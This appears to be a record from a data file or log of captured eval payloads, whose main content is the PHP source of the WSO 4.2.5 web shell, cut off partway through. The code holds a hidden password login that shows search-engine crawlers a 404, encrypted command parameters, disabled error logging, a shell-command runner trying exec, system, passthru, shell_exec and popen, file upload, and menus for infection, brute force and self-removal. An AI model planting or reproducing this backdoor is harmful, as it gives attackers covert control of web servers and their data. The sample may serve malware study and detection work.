k51i6o5l1po6m5awq5w1as6x1zex65ze9fer8f4r98g7rt98g7ty89h7y98j7yu98k7ui98k798o7l98opmw1zd5x1c16ef51v6r51f6bv1g65b1t6hn1t6h51n6y1n6y5h1ty6j5y1u6j5u1i6k51i6o5l1po6m5awq5w1as6x1zex65ze9fer8f4r98g7rt98g7ty89h7y98j7yu98k7ui98k798o7l98opmw1zd5x1c16ef51v6r51f6bv1g65b1t6hn1t6h51n6y1n6y5h1ty6j5y1u6j5u1i6k51i6o5l1po6m5awq5w1as6x1zex65ze9fer8f4r98g7rt98g7ty89h7y98j7yu98k7ui98k798o7l98opmw1zd5x1c16ef51v6r51f6bv1g65b1t6hn1t6h51n6y1n6y5h1ty6j5y1u6j5u1i6k51i6o5l1po6m5awq5w1as6x1zex65ze9fer8f4r98g7rt98g7ty89h7y98j7yu98k7ui98k798o7l98opmw1zd5x1c16ef51v6r51f6bv1g65b1t6hn1t6h51n6y1n6y5h1ty6j5y1u6j5u1i6k51i6o5l1po6m5awq5w1as6x1zex65ze9fer8f4r98g7rt98g7ty89h7y98j7yu98k7ui98k798o7l98opmw1zd5x1c16ef51v6r51f6bv1g65b1t6hn1t6h51n6y1n6y5h1ty6j5y1u6j5u1i6k51i6o5l1po6m5awq5w1as6x1zex65ze9fer8f4r98g7rt98g7ty89h7y98j7yu98k7ui98k798o7l98opmw1zd5x1c16ef51v6r51f6bv1g65b1t6hn1t6h51n6y1n6y5h1ty6j5y1u6j5u1i6k51i6o5l1po6m5awq5w1as6x1zex65ze9fer8f4r98g7rt98g7ty89h7y98j7yu98k7ui98k798o7l98opmw1zd5x1c16ef51v6r51f6bv1g65b1t6hn1t6h51n6y1n6y5h1ty6j5y1u6j5u1i6k51i6o5l1po6m5awq5w1as6x1zex65ze9fer8f4r98g7rt98g7ty89h7y98j7yu98k7ui98k798o7l98opmw1zd5x1c16ef51v6r51f6bv1g65b1t6hn1t6h51n6y1n6y5h1ty6j5y1u6j5u1i6k51i6o5l1po6m5awq5w1as6x1zex65ze9fer8f4r98g7rt98g7ty89h7y98j7yu98k7ui98k798o7l98opmw1zd5x1c16ef51v6r51f6bv1g65b1t6hn1t6h51n6y1n6y5h1ty6j5y1u6j5u1i6k51i6o5l1po6m5awq5w1as6x1zex65ze9fer8f4r98g7rt98g7ty89h7y98j7yu98k7ui98k798o7l98opmw1zd5x1c16ef51v6r51f6bv1g65b1t6hn1t6h51n6y1n6 = 'if (!isset($_POST[\'lynx\'])) {\r\n\r\n$▛ = ""; //admin\r\n$▘ = true;\r\n$▜ = \'UTF-8\';\r\n$▚ = \'FilesMan\';\r\n$▙ = md5($_SERVER[\'HTTP_USER_AGENT\']);\r\n\r\nfunction decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);}\r\nfunction prototype($k, $v) { $_COOKIE[$k] = $v;se'
2	10	0	0.010796	1514328	eval	1	'if (!isset($_POST[\'lynx\'])) {\r\n\r\n$▛ = ""; //admin\r\n$▘ = true;\r\n$▜ = \'UTF-8\';\r\n$▚ = \'FilesMan\';\r\n$▙ = md5($_SERVER[\'HTTP_USER_AGENT\']);\r\n\r\nfunction decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);}\r\nfunction prototype($k, $v) { $_COOKIE[$k] = $v;setcookie($k, $v);}\r\n\r\nif (!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"])) {\r\n\tprototype(md5($_SERVER[\'HTTP_HOST\'])."key", $▙);\r\n}\r\nif(empty($_POST[\'charset\']))\r\n\t$_POST[\'charset\'] = $▜;\r\nif (!isset($_POST[\'ne\'])) {\r\n\tif(isset($_POST[\'a\'])) $_POST[\'a\'] = iconv("utf-8", $_POST[\'charset\'], decrypt($_POST[\'a\'],$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]));\r\n\tif(isset($_POST[\'c\'])) $_POST[\'c\'] = iconv("utf-8", $_POST[\'charset\'], decrypt($_POST[\'c\'],$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]));\r\n\tif(isset($_POST[\'p1\'])) $_POST[\'p1\'] = iconv("utf-8", $_POST[\'charset\'], decrypt($_POST[\'p1\'],$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]));\r\n\tif(isset($_POST[\'p2\'])) $_POST[\'p2\'] = iconv("utf-8", $_POST[\'charset\'], decrypt($_POST[\'p2\'],$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]));\r\n\tif(isset($_POST[\'p3\'])) $_POST[\'p3\'] = iconv("utf-8", $_POST[\'charset\'], decrypt($_POST[\'p3\'],$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]));\r\n}\r\n//function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);}\r\n@ini_set(\'error_log\',NULL);\r\n@ini_set(\'log_errors\',0);\r\n@ini_set(\'max_execution_time\',0);\r\n@set_time_limit(0);\r\nif (PHP_VERSION_ID < 70000)\r\n\t@set_magic_quotes_runtime(0);\r\n@define(\'VERSION\', \'4.2.5\');\r\nif(get_magic_quotes_gpc()) {\r\n\tfunction stripslashes_array($array) {\r\n\t\treturn is_array($array) ? array_map(\'stripslashes_array\', $array) : stripslashes($array);\r\n\t}\r\n\t$_POST = stripslashes_array($_POST);\r\n    $_COOKIE = stripslashes_array($_COOKIE);\r\n}\r\n/* (С) 11.2011 oRb */\r\nif(!empty($▛)) {\r\n    if(isset($_POST[\'pass\']) && (md5($_POST[\'pass\']) == $▛))\r\n        prototype(md5($_SERVER[\'HTTP_HOST\']), $▛);\r\n    if (!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])]) || ($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])] != $▛))\r\n        hardLogin();\r\n}\r\nif(!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\']))\r\n    $_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = (bool)$▘;\r\nfunction hardLogin() {\r\n\t\tif(!empty($_SERVER[\'HTTP_USER_AGENT\'])) {\r\n\t\t  $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");\r\n\t\t  if(preg_match(\'/\' . implode(\'|\', $userAgents) . \'/i\', $_SERVER[\'HTTP_USER_AGENT\'])) {\r\n\t\t  header(\'HTTP/1.0 404 Not Found\');\r\n\t\t  exit;\r\n\t\t  }\r\n\t\t}\r\n\tdie("<pre align=center><form method=post>Password<br><input type=password name=pass style=\'background-color:whitesmoke;border:1px solid #FFF;outline:none;\' required><input type=submit name=\'watching\' value=\'submit\' style=\'border:none;background-color:#56AD15;color:#fff;cursor:pointer;\'></form></pre>");\r\n}\r\nif(strtolower(substr(PHP_OS,0,3)) == "win")\r\n\t$os = \'win\';\r\nelse\r\n\t$os = \'nix\';\r\n$safe_mode = @ini_get(\'safe_mode\');\r\nif(!$safe_mode)\r\n    error_reporting(0);\r\n$disable_functions = @ini_get(\'disable_functions\');\r\n$home_cwd = @getcwd();\r\nif(isset($_POST[\'c\']))\r\n\t@chdir($_POST[\'c\']);\r\n$cwd = @getcwd();\r\nif($os == \'win\') {\r\n\t$home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n\t$cwd = str_replace("\\\\", "/", $cwd);\r\n}\r\nif($cwd[strlen($cwd)-1] != \'/\')\r\n\t$cwd .= \'/\';\r\n/* (С) 04.2015 Pirat */\r\nfunction hardHeader() {\r\n\tif(empty($_POST[\'charset\']))\r\n\t\t$_POST[\'charset\'] = $GLOBALS[\'▜\'];\r\n\techo "<html><head><meta http-equiv=\'Content-Type\' content=\'text/html; charset=" . $_POST[\'charset\'] . "\'><title>" . $_SERVER[\'HTTP_HOST\'] . " - WSO " . VERSION ."</title>\r\n<style>\r\n\tbody {background-color:#444; color:#e1e1e1; margin:0; font:normal 75% Arial, Helvetica, sans-serif; } canvas{ display: block; vertical-align: bottom;}\r\n\r\n\t#particles-js{width: 100%; height: 100px; background-color: #060a10; background-image: url(\'\'); background-repeat: no-repeat; background-size: cover; background-position: 50% 50%;}\r\n\tbody,td,th\t{font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}\r\n\ttable.info\t{color: #fff;background-color: #222;}\r\n\ttable#toolsTbl {background-color: #222;}\r\n\tspan,h1,a\t{color:#df5 !important;}\r\n\tspan\t\t{font-weight:bolder;}\r\n\th1\t\t\t{border-left:5px solid #2E6E9C;padding:2px 5px;font:14pt Verdana;background-color:#222;margin:0px;}\r\n\tdiv.content\t{padding:5px;margin-left:5px;background-color:#060a10;}\r\n\ta\t\t\t{text-decoration:none;}\r\n\ta:hover\t\t{text-decoration:underline;}\r\n\t.tooltip::after {background:#0663D5;color:#FFF;content: attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden;}\r\n\t.tooltip:hover::after {opacity:1;visibility:visible;}\r\n\t.ml1\t\t{border:1px solid #202832;padding:5px;margin:0;overflow:auto;}\r\n\t.bigarea\t{min-width:100%;max-width:100%;height:400px;}\r\n\tinput, textarea, select\t{margin:0;color:#fff;background-color:#202832;border:solid 1px #df5;font:9pt Courier New;outline:none;}\r\n\tlabel {position:relative}\r\n\tlabel:after {content:\'<>\';font:10px \'Consolas\', monospace;color:#fff;-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg);right:3px; top:3px;padding:0;position:absolute;pointer-events:none;}\r\n\tlabel:before {content:\'\';right:0; top:0;width:17px; height:17px;background:#202832;position:absolute;pointer-events:none;display:block;}\r\n\tform\t\t{margin:0px;}\r\n\t#toolsTbl\t{text-align:center;}\r\n\t#fak \t\t{background:none;}\r\n\t#fak td \t{padding:5px 0 0 0;}\r\n\tiframe\t\t{border:1px solid #060a10;}\r\n\t.toolsInp\t{width:300px}\r\n    .main th{text-align:left;background-color:#5e5e5e;}\r\n    .main tr:hover{background-color:#5e5e5e}\r\n\tinput[type=\'submit\']{background-color:#2E6E9C;}\r\n\tinput[type=\'button\']{background-color:#2E6E9C;}\r\n\tinput[type=\'submit\']:hover{background-color:#56AD15;}\r\n\tinput[type=\'button\']:hover{background-color:#56AD15;}\r\n\t.l2{background-color:#444}\r\n    .l1{background-color:#333}\r\n\tpre\t\t\t{font:9pt Courier New;}\r\n</style>\r\n<script>\r\n    var c_ = \'" . htmlspecialchars($GLOBALS[\'cwd\']) . "\';\r\n    var a_ = \'" . htmlspecialchars(@$_POST[\'a\']) ."\'\r\n    var charset_ = \'" . htmlspecialchars(@$_POST[\'charset\']) ."\';\r\n    var p1_ = \'" . ((strpos(@$_POST[\'p1\'],"\\n")!==false)?\'\':htmlspecialchars($_POST[\'p1\'],ENT_QUOTES)) ."\';\r\n    var p2_ = \'" . ((strpos(@$_POST[\'p2\'],"\\n")!==false)?\'\':htmlspecialchars($_POST[\'p2\'],ENT_QUOTES)) ."\';\r\n    var p3_ = \'" . ((strpos(@$_POST[\'p3\'],"\\n")!==false)?\'\':htmlspecialchars($_POST[\'p3\'],ENT_QUOTES)) ."\';\r\n    var d = document;\r\n\t\r\n\tfunction encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr=\'\';var enc_str=\'\';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}\r\n\tfunction utf8_encode(argString){var string=(argString+\'\');var utftext=\'\',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}\r\n\tfunction base64_encode(data){var b64 = \'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc=\'\',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+\'\');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join(\'\');switch (data.length%3){case 1:enc=enc.slice(0,-2)+\'==\';break;case 2:enc=enc.slice(0,-1)+\'=\';break;}return enc;}\r\n\tfunction set(a,c,p1,p2,p3,charset) {\r\n\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\r\n\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\r\n\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\r\n\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\r\n\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\r\n\t\td.mf.a.value = encrypt(d.mf.a.value,\'".$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]."\');\r\n\t\td.mf.c.value = encrypt(d.mf.c.value,\'".$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]."\');\r\n\t\td.mf.p1.value = encrypt(d.mf.p1.value,\'".$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]."\');\r\n\t\td.mf.p2.value = encrypt(d.mf.p2.value,\'".$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]."\');\r\n\t\td.mf.p3.value = encrypt(d.mf.p3.value,\'".$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]."\');\r\n\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t}\r\n\tfunction g(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\td.mf.submit();\r\n\t}\r\n\tfunction a(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\tvar params = \'ajax=true\';\r\n\t\tfor(i=0;i<d.mf.elements.length;i++)\r\n\t\t\tparams += \'&\'+d.mf.elements[i].name+\'=\'+encodeURIComponent(d.mf.elements[i].value);\r\n\t\tsr(\'" . addslashes($_SERVER[\'REQUEST_URI\']) ."\', params);\r\n\t}\r\n\tfunction sr(url, params) {\r\n\t\tif (window.XMLHttpRequest)\r\n\t\t\treq = new XMLHttpRequest();\r\n\t\telse if (window.ActiveXObject)\r\n\t\t\treq = new ActiveXObject(\'Microsoft.XMLHTTP\');\r\n        if (req) {\r\n            req.onreadystatechange = processReqChange;\r\n            req.open(\'POST\', url, true);\r\n            req.setRequestHeader (\'Content-Type\', \'application/x-www-form-urlencoded\');\r\n            req.send(params);\r\n        }\r\n\t}\r\n\tfunction processReqChange() {\r\n\t\tif( (req.readyState == 4) )\r\n\t\t\tif(req.status == 200) {\r\n\t\t\t\tvar reg = new RegExp(\\"(\\\\\\\\d+)([\\\\\\\\S\\\\\\\\s]*)\\", \'m\');\r\n\t\t\t\tvar arr=reg.exec(req.responseText);\r\n\t\t\t\teval(arr[2].substr(0, arr[1]));\r\n\t\t\t} else alert(\'Request error!\');\r\n\t}\r\n</script>\r\n<head><body><div style=\'position:absolute;background-color:rgba(95, 110, 130, 0.3);width:100%;top:0;left:0;\'>\r\n<form method=post name=mf style=\'display:none;\'>\r\n<input type=hidden name=a>\r\n<input type=hidden name=c>\r\n<input type=hidden name=p1>\r\n<input type=hidden name=p2>\r\n<input type=hidden name=p3>\r\n<input type=hidden name=charset>\r\n</form>";\r\n\t$freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n\t$totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n\t$totalSpace = $totalSpace?$totalSpace:1;\r\n\t$release = @php_uname(\'r\');\r\n\t$kernel = @php_uname(\'s\');\r\n\t$explink = \'https://noreferer.de/?https://www.exploit-db.com/search/?action=search&description=\';\r\n\tif(strpos(\'Linux\', $kernel) !== false)\r\n\t\t$explink .= urlencode(\'Linux Kernel \' . substr($release,0,6));\r\n\telse\r\n\t\t$explink .= urlencode($kernel . \' \' . substr($release,0,3));\r\n\tif(!function_exists(\'posix_getegid\')) {\r\n\t\t$user = @get_current_user();\r\n\t\t$uid = @getmyuid();\r\n\t\t$gid = @getmygid();\r\n\t\t$group = "?";\r\n\t} else {\r\n\t\t$uid = @posix_getpwuid(@posix_geteuid());\r\n\t\t$gid = @posix_getgrgid(@posix_getegid());\r\n\t\t$user = $uid[\'name\'];\r\n\t\t$uid = $uid[\'uid\'];\r\n\t\t$group = $gid[\'name\'];\r\n\t\t$gid = $gid[\'gid\'];\r\n\t}\r\n\t$cwd_links = \'\';\r\n\t$path = explode("/", $GLOBALS[\'cwd\']);\r\n\t$n=count($path);\r\n\tfor($i=0; $i<$n-1; $i++) {\r\n\t\t$cwd_links .= "<a href=\'#\' onclick=\'g(\\"FilesMan\\",\\"";\r\n\t\tfor($j=0; $j<=$i; $j++)\r\n\t\t\t$cwd_links .= $path[$j].\'/\';\r\n\t\t$cwd_links .= "\\")\'>".$path[$i]."/</a>";\r\n\t}\r\n\t$charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n\t$opt_charsets = \'\';\r\n\tforeach($charsets as $▟)\r\n\t\t$opt_charsets .= \'<option value="\'.$▟.\'" \'.($_POST[\'charset\']==$▟?\'selected\':\'\').\'>\'.$▟.\'</option>\';\r\n\t$m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Infect\'=>\'Infect\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Safe mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Bruteforce\'=>\'Bruteforce\',\'Network\'=>\'Network\');\r\n\tif(!empty($GLOBALS[\'▛\']))\r\n\t$m[\'Logout\'] = \'Logout\';\r\n\t$m[\'Self remove\'] = \'SelfRemove\';\r\n\t$menu = \'\';\r\n\tforeach($m as $k => $v)\r\n\t\t$menu .= \'<th>[ <a href="#" onclick="g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')">\'.$k.\'</a> ]</th>\';\r\n\t$drives = "";\r\n\tif ($GLOBALS[\'os\'] == \'win\') {\r\n\t\tforeach(range(\'c\',\'z\') as $drive)\r\n\t\tif (is_dir($drive.\':\\\\\'))\r\n\t\t\t$drives .= \'<a href="#" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\r\n\t}\r\n\t/* (С) 08.2015 dmkcv */\r\n\techo \'<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:\'.($GLOBALS[\'os\'] == \'win\'?\'<br>Drives:\':\'\').\'</span></td>\'.\r\n\t\t \'<td><nobr>\'.substr(@php_uname(), 0, 120).\' <a href="https://noreferer.de/?https://www.google.com/search?q=\'.urlencode(@php_uname()).\'" target="_blank">[ Google ]</a> <a href="\'.$explink.\'" target=_blank>[ Exploit-DB ]</a></nobr><br>\'.$uid.\' ( \'.$user.\' ) <span>Group:</span> \'.$gid.\' ( \' .$group. \' )<br>\'.@phpversion().\' <span>Safe mode:</span> \'.($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=#FFDB5F><b>OFF</b></font>\').\' <a href=# onclick="g(\\\'Php\\\',null,null,\\\'info\\\')">[ phpinfo ]</a> <span>Datetime:</span> \'.date(\'Y-m-d H:i:s\').\'<br>\'.viewSize($totalSpace).\' <span>Free:</span> \'.viewSize($freeSpace).\' (\'.round(100/($totalSpace/$freeSpace),2).\'%)<br>\'.$cwd_links.\' \'.viewPermsColor($GLOBALS[\'cwd\']).\' <a href=# onclick="g(\\\'FilesMan\\\',\\\'\'.$GLOBALS[\'home_cwd\'].\'\\\',\\\'\\\',\\\'\\\',\\\'\\\')">[ home ]</a><br>\'.$drives.\'</td>\'.\r\n\t\t \'<td width=1 align=right><nobr><label><select onchange="g(null,null,null,null,null,this.value)">\'.$opt_charsets.\'</select></label><br><span>Server IP:</span><br>\'.gethostbyname($_SERVER["HTTP_HOST"]).\'<br><span>Client IP:</span><br>\'.$_SERVER[\'REMOTE_ADDR\'].\'</nobr></td></tr></table>\'.\r\n\t\t \'<table style="background-color:#2E6E9C;" cellpadding=3 cellspacing=0 width=100%><tr>\'.$menu.\'</tr></table><div>\';\r\n}\r\nfunction hardFooter() {\r\n\t$is_writable = is_writable($GLOBALS[\'cwd\'])?" <font color=\'#FFDB5F\'>[ Writeable ]</font>":" <font color=red>(Not writable)</font>";\r\n    echo "\r\n</div>\r\n<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>\r\n\t<tr>\r\n\t\t<td><form onsubmit=\\"".( function_exists(\'actionFilesMan\')? "g(null,this.c.value,\'\');":\'\' )."return false;\\"><span>Change dir:</span><br><input class=\'toolsInp\' type=text name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'><input type=submit value=\'submit\'></form></td>\r\n\t\t<td><form onsubmit=\\"".(function_exists(\'actionFilesTools\')? "g(\'FilesTools\',null,this.f.value);":\'\' )."return false;\\"><span>Read file:</span><br><input class=\'toolsInp\' type=text name=f required><input type=submit value=\'submit\'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\\"".( function_exists(\'actionFilesMan\')? "g(\'FilesMan\',null,\'mkdir\',this.d.value);":\'\' )."return false;\\"><span>Make dir:</span>$is_writable<br><input class=\'toolsInp\' type=text name=d required><input type=submit value=\'submit\'></form></td>\r\n\t\t<td><form onsubmit=\\"".( function_exists(\'actionFilesTools\')? "g(\'FilesTools\',null,this.f.value,\'mkfile\');":\'\' )."return false;\\"><span>Make file:</span>$is_writable<br><input class=\'toolsInp\' type=text name=f required><input type=submit value=\'submit\'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\\"".( function_exists(\'actionConsole\')? "g(\'Console\',null,this.c.value);":\'\' )."return false;\\"><span>Execute:</span><br><input class=\'toolsInp\' type=text name=c value=\'\'><input type=submit value=\'submit\'></form></td>\r\n\t\t<td><form method=\'post\' ".( (!function_exists(\'actionFilesMan\'))? " onsubmit=\\"return false;\\" ":\'\' )."ENCTYPE=\'multipart/form-data\'>\r\n\t\t<input type=hidden name=a value=\'FilesMan\'>\r\n\t\t<input type=hidden name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'>\r\n\t\t<input type=hidden name=p1 value=\'uploadFile\'>\r\n\t\t<input type=hidden name=ne value=\'\'>\r\n\t\t<input type=hidden name=charset value=\'" . (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') . "\'>\r\n\t\t<span>Upload file:</span>$is_writable<br><input class=\'toolsInp\' type=file name=f[]  multiple><input type=submit value=\'submit\'></form><br  ></td>\r\n\t</tr></table></div>\r\n\t<!-- particles --> <div id=\'particles-js\'></div><script src=\'https://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js\'></script>\r\n\t<script>particlesJS(\'particles-js\', {\'particles\':{\'number\':{\'value\':80,\'density\':{\'enable\':true,\'value_area\':800}},\'color\':{\'value\':\'#ffffff\'},\'shape\':{\'type\':\'triangle\',\'stroke\':{\'width\':0,\'color\':\'#000000\'},\'polygon\':{\'nb_sides\':5},\'image\':{\'src\':\'img/github.svg\',\'width\':100,\'height\':100}},\'opacity\':{\'value\':0.5,\'random\':true,\'anim\':{\'enable\':false,\'speed\':1,\'opacity_min\':0.1,\'sync\':false}},\'size\':{\'value\':3,\'random\':true,\'anim\':{\'enable\':false,\'speed\':40,\'size_min\':0.1,\'sync\':false}},\'line_linked\':{\'enable\':true,\'distance\':200,\'color\':\'#ffffff\',\'opacity\':0.4,\'width\':1},\'move\':{\'enable\':true,\'speed\':1,\'direction\':\'none\',\'random\':true,\'straight\':false,\'out_mode\':\'out\',\'bounce\':false,\'attract\':{\'enable\':false,\'rotateX\':10000,\'rotateY\':10000}}},\'interactivity\':{\'detect_on\':\'canvas\',\'events\':{\'onhover\':{\'enable\':true,\'mode\':\'grab\'},\'onclick\':{\'enable\':true,\'mode\':\'repulse\'},\'resize\':true},\'modes\':{\'grab\':{\'distance\':200,\'line_linked\':{\'opacity\':0.5}},\'bubble\':{\'particles_nb\':2}}},\'retina_detect\':true});</script>\r\n\t</body></html>";\r\n}\r\nif (!function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false)) { function posix_getpwuid($p) {return false;} }\r\nif (!function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false)) { function posix_getgrgid($p) {return false;} }\r\nfunction ex($in) {\r\n\t$▖ = \'\';\r\n\tif (function_exists(\'exec\')) {\r\n\t\t@exec($in,$▖);\r\n\t\t$▖ = @join("\\n",$▖);\r\n\t} elseif (function_exists(\'passthru\')) {\r\n\t\tob_start();\r\n\t\t@passthru($in);\r\n\t\t$▖ = ob_get_clean();\r\n\t} elseif (function_exists(\'system\')) {\r\n\t\tob_start();\r\n\t\t@system($in);\r\n\t\t$▖ = ob_get_clean();\r\n\t} elseif (function_exists(\'shell_exec\')) {\r\n\t\t$▖ = shell_exec($in);\r\n\t} elseif (is_resource($f = @popen($in,"r"))) {\r\n\t\t$▖ = "";\r\n\t\twhile(!@feof($f))\r\n\t\t\t$▖ .= fread($f,1024);\r\n\t\tpclose($f);\r\n\t}else return "↳ Unable to execute command\\n";\r\n\treturn ($▖==\'\'?"↳ Query did not return anything\\n":$▖);\r\n}\r\nfunction viewSize($s) {\r\n\tif($s >= 1073741824)\r\n\t\treturn sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\r\n\telseif($s >= 1048576)\r\n\t\treturn sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n\telseif($s >= 1024)\r\n\t\treturn sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n\telse\r\n\t\treturn $s . \' B\';\r\n}\r\nfunction perms($p) {\r\n\tif (($p & 0xC000) == 0xC000)$i = \'s\';\r\n\telseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n\telseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n\telseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n\telseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n\telseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n\telseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n\telse $i = \'u\';\r\n\t$i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n\t$i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n\t$i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n\t$i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n\t$i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n\t$i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n\t$i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n\t$i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n\t$i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));\r\n\treturn $i;\r\n}\r\nfunction viewPermsColor($f) {\r\n\tif (!@is_readable($f))\r\n\t\treturn \'<font color=#FF0000><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n\telseif (!@is_writable($f))\r\n\t\treturn \'<font color=white><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n\telse\r\n\t\treturn \'<font color=#FFDB5F><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n}\r\nfunction hardScandir($dir) {\r\n    if(function_exists("scandir")) {\r\n        return scandir($dir);\r\n    } else {\r\n        $dh  = opendir($dir);\r\n        while (false !== ($filename = readdir($dh)))\r\n            $files[] = $filename;\r\n        return $files;\r\n    }\r\n}\r\nfunction which($p) {\r\n\t$path = ex(\'which \' . $p);\r\n\tif(!empty($path))\r\n\t\treturn $path;\r\n\treturn false;\r\n}\r\nfunction actionRC() {\r\n\tif(!@$_POST[\'p1\']) {\r\n\t\t$a = array(\r\n\t\t\t"uname" => php_uname(),\r\n\t\t\t"php_version" => 